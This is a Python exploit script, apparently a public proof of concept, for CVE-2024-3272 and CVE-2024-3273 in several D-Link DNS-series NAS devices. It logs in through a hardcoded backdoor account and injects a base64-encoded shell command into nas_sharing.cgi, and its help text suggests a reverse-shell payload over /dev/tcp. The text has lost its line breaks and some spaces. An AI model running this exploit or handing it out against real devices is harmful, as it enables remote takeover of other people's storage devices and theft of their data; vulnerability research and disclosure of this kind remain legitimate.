# Author: Nick Swink (c0rnbread)# Original post: https://github.com/netsecfish/dlink# CVE-2024-3272 + CVE-2024-3273## Description: Backdoor Authentication Bypass + Command Injection # Affected Devices:# DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013# DNS-325 Version 1.01# DNS-327L Version 1.09, Version 1.00.0409.2013# DNS-340L Version 1.08importrequests,argparse,base64defmain(url,command):base64_command=base64.b64encode(command.encode('utf-8'))base64_command=base64_command.decode('utf-8')uri=f"/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={base64_command}"print("Sending exploit request to endpoint...")print(url+uri)r=requests.get(url+uri)ifr.status_code==200:print("Status code: 200")print("Exploit appeared to succeed!")print(f"\n\tPrinting output: {base64.b64decode(r.text).decode('utf-8')}")else:print("Status NOT 200")print("Exploit Failed. Exiting...")exit()if__name__=="__main__":parser=argparse.ArgumentParser(description="Execute arbitrary command on remote system.")parser.add_argument("url",help="Base URL of the D-Link web interface. e.g., http://example.com")parser.add_argument("command",help="Command to be executed. e.g., /bin/sh -i >& /dev/tcp/localhost/9999 0>&1")args=parser.parse_args()main(args.url,args.command)